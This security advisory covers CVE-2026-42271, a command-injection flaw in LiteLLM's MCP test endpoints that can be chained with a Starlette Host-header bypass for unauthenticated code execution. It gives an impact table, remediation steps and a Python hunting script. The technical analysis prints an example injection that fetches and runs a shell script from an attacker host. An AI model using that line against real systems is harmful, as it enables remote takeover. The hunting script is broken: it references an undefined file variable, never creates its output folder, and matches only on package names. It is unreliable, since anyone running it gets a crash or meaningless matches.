LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers

Executive Summary

CISA added CVE-2026-42271 to the Known Exploited Vulnerabilities catalog on 2026-06-08, marking it as actively exploited CISA KEV. The affected product is BerriAI LiteLLM, an open-source AI gateway and LLM proxy. The vulnerability is a command injection flaw in the Model Context Protocol (MCP) server preview endpoints that allows attackers to execute arbitrary shell commands on the hosting system.

While the vulnerability originally required authentication with a valid API key, researchers have confirmed that it can be chained with CVE-2026-48710 (the “BadHost” Host header validation bypass in Starlette), allowing unauthenticated remote attackers to bypass the authentication middleware and achieve Remote Code Execution (RCE) on the server. BerriAI has addressed the issue in LiteLLM version 1.83.7-stable by restricting access to these endpoints to the PROXY_ADMIN role. Treat any LiteLLM instance exposed to the internet between versions 1.74.2 and 1.83.6 as a critical intrusion risk.

Key Facts

Cve: CVE-2026-42271

Vendor: BerriAI

Product: LiteLLM

Vulnerability: Command injection in MCP preview endpoints

Cwe: CWE-78

Disclosed Date: 2026-06-08

Kev Added: 2026-06-08

Affected Packages:

• litellm

Affected Versions: 1.74.2 to 1.83.6

Fixed Version: 1.83.7-stable

Chaining Cve: CVE-2026-48710

High Value Evidence:

• litellm —version
• POST /mcp-rest/test/connection
• POST /mcp-rest/test/tools/list

Evidence Assessment

• confirmed: CISA added CVE-2026-42271 to the KEV catalog, verifying active exploitation in the wild CISA KEV.
• confirmed: NIST NVD and security advisories describe the vulnerability as a command injection in the LiteLLM Model Context Protocol connection test and tools listing endpoints NIST NVD.
• confirmed: BerriAI released version 1.83.7-stable to patch the vulnerability by enforcing PROXY_ADMIN authorization for /mcp-rest/test/* endpoints LiteLLM Release.
• confirmed: Security researchers demonstrated chaining this flaw with Starlette’s BadHost vulnerability (CVE-2026-48710) to execute code without authentication.

Impact Determination

Classification	Criteria	Required evidence	Handling decision
Confirmed compromise	System logs show requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list containing shell metacharacters or unexpected executable commands, or unrecognized admin credentials created.	HTTP request payload traces, process execution logs showing shell spawning under the LiteLLM process user, or unauthorized system configuration changes.	Isolate the host immediately, rotate all keys/secrets stored in LiteLLM (including OpenAI, Anthropic, AWS, GCP API keys), and conduct full system forensics.
Presumed exposed	LiteLLM is running version < 1.83.7-stable and the proxy admin panel or MCP features are enabled or exposed.	Lockfiles (requirements.txt, poetry.lock) showing litellm version within the range 1.74.2 to 1.83.6.	Upgrade to 1.83.7-stable or newer immediately; restrict internet access to admin/MCP paths.
Potentially exposed	LiteLLM is present in the asset inventory but the exact version or feature configuration is unverified.	Software inventory, container registry tags, or repository dependency checks.	Run dependency checks and verify version status.
Not exposed	LiteLLM is verified to be on version >= 1.83.7-stable, or the product is not used in the environment.	Verified build logs or inventory exclusion.	No immediate action required.
Unknown	System logs or version information is missing.	Telemetry gap in application or host level logging.	Assume exposure and update packages proactively.

Timeline

• 2026-06-08: CISA adds CVE-2026-42271 to the Known Exploited Vulnerabilities catalog.
• 2026-06-08: Security advisories publish the Starlette BadHost chain details showing unauthenticated RCE.
• 2026-06-09: This threat post analysis is published.

Technical Analysis

LiteLLM provides proxy management endpoints for testing Model Context Protocol (MCP) servers. The endpoints POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list accept an MCP server configuration object. This configuration includes fields like command (the command to launch the MCP server) and args (the CLI arguments). [1]

Because LiteLLM passed these inputs directly to system shell execution processes without validation, an attacker could supply arbitrary commands (e.g. ; curl http://attacker.com/shell.sh | sh). When combined with CVE-2026-48710, an attacker could bypass authentication checks, allowing any remote user to execute commands with the privileges of the LiteLLM process. [1]

Affected Assets and Blast Radius

Asset Selectors:

• litellm

Highest Value Assets:

• Internet-exposed LiteLLM proxy servers handling production API keys

Credentials And Data At Risk:

• Upstream API tokens (OpenAI, Anthropic, Cohere, AWS, Azure, GCP)
• Local server shell access and SSH keys

Indicators of Compromise

The following indicators of compromise (IOCs) can be used to scope exposure across local repositories, systems, and telemetry exports:

Package Versions

• litellm
• starlette

Detection and Hunting

Hunt Manifest: litellm-cve-2026-42271-kev-hunt-1

• Title: local repository and exported telemetry scope
• Question: Does the telemetry scope contain patterns associated with LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers?
• Telemetry Family: process
• Telemetry Context: host filesystem or log export
• Positive Signal: Indicators of compromise matched in telemetry: local repository and exported telemetry scope

#!/usr/bin/env python3
import os
import sys
from pathlib import Path

ROOT = sys.argv[1] if len(sys.argv) > 1 else "."
LOG_ROOT = os.environ.get("LOG_ROOT", "")
OUT = Path(os.environ.get("OUT", "hp-litellm-cve-2026-42271-kev-scope"))

PACKAGES = ["litellm","starlette"]

# Collect unique indicators
indicators = set()
for group in [PACKAGES]:
    for val in group:
        if val:
            indicators.add(val)

with open(indicators_file, "w") as f:
    for ind in sorted(indicators):
        f.write(ind + "\n")

print(f"[+] Written unique selectors to {indicators_file}")

# Walk local directory
print(f"[+] Scanning directory: {ROOT} for selectors...")
matches = []
exclude_dirs = {"node_modules", "vendor", "dist", ".git"}
for root, dirs, filenames in os.walk(ROOT):
    dirs[:] = [d for d in dirs if d not in exclude_dirs]
    for filename in filenames:
        filepath = Path(root) / filename
        try:
            content = filepath.read_text(errors="ignore")
            for ind in indicators:
                if ind in content:
                    matches.append(f"{filepath}: found '{ind}'")
        except Exception:
            pass  # pass # return or raise not needed here

if matches:
    (OUT / "repository-indicator-matches.txt").write_text("\n".join(matches) + "\n")
    print(f"[!] Found {len(matches)} matches in codebase!")

# Optional Log Scanning
if LOG_ROOT and os.path.exists(LOG_ROOT):
    print(f"[+] Scanning telemetry log directory: {LOG_ROOT}...")
    log_matches = []
    for root, _, filenames in os.walk(LOG_ROOT):
        for filename in filenames:
            filepath = Path(root) / filename
            try:
                content = filepath.read_text(errors="ignore")
                for ind in indicators:
                    if ind in content:
                        log_matches.append(f"{filepath}: found '{ind}'")
            except Exception:
                pass  # pass # return or raise not needed here
    if log_matches:
        (OUT / "exported-telemetry-indicator-matches.txt").write_text("\n".join(log_matches) + "\n")
        print(f"[!] Found {len(log_matches)} matches in logs!")

    if PACKAGES:
        registry_dir = OUT / "registry"
        registry_dir.mkdir(exist_ok=True)

print(f"[+] Wrote scope artifacts under {OUT}")

Sources

1. CISA: KEV Catalog - Role: PRIMARY_RESEARCH - Impact: Active exploitation confirmation.
2. BerriAI: LiteLLM GitHub Security Advisory - Role: DIRECT_SOURCE - Impact: Vulnerability description and official patch.
3. NIST NVD: CVE-2026-42271 - Role: ENRICHMENT_DATA - Impact: Severity and categorization mapping.